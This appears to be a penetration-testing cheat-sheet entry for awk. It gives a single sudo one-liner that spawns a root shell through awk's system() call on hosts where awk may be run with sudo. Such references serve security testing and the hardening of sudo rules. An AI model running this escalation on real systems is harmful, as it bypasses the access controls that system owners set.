awk

#one liner for root

sudo awk 'BEGIN {system("/bin/bash")}'

#root

Last updated